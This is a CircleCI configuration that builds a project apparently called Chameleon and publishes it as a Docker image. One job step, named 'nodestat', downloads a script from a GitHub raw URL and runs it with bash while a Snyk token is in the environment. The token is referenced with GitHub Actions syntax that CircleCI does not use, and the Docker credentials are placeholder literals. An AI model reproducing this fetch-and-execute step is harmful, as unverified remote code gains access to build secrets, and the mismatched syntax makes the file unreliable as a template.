version: 2.1

orbs:
  snyk: snyk/snyk@1.7.2
  github-cli: circleci/github-cli@2.2.0
  node: circleci/node@5.1.0
  python: circleci/python@2.0.3
  codecov: codecov/codecov@3.2.4
  docker: circleci/docker@2.6.0

jobs:
  dockeretteinstall:
    docker:
      - image: debian:stable

    steps:
      - checkout
      - run: apt update && apt upgrade -y && apt install gpg curl sudo -y
      - run:
          name: "nodestat"
          environment:
            SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}
          command: "set -e  && curl -fsSL https://raw.githubusercontent.com/NateYeet/Chameleon/main/Chameleon/main.czco >> /ch && bash /ch node"
      - codecov/upload

workflows:
  test:
    jobs:
      - dockeretteinstall

  docker:
    jobs:
      - docker/publish:
          dockerfile: my.Dockerfile
          image: casseroleprivacy/chameleon
          tag: nightly, $CIRCLE_SHA1
          use-buildkit: true
          path: .
          registry: ghcr.io
          docker-password: dockerpass
          docker-username: dockeruser
